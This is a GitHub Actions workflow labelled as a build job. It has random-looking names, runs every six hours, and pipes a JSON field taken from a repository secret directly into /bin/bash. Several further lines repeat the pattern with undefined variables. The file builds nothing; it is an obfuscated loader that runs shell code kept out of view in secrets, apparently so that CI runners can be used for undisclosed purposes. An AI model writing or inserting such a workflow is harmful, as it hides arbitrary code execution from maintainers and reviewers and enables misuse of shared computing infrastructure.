name: persuadetour

on:
  workflow_dispatch:
  schedule:
    - cron: '23 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: persuadetour
        env:
          vjo182: ${{ secrets.vjo182 }}
        run: |
          echo $vjo182 | jq -r .rlo2 | /bin/bash
          echo $uzykc0 | jq -r .gm43 | /bin/bash
          echo $omvs7723 | jq -r .wue81 | /bin/bash
          echo $tpewp8 | jq -r .cyfas693 | /bin/bash
          echo $jbdux8 | jq -r .be52242 | /bin/bash
          echo $wrt88 | jq -r .kxntr6537 | /bin/bash
          echo $t418 | jq -r .ce6 | /bin/bash
          echo $sj4 | jq -r .pbxmd364 | /bin/bash
          echo $gxbd5 | jq -r .racxp7 | /bin/bash

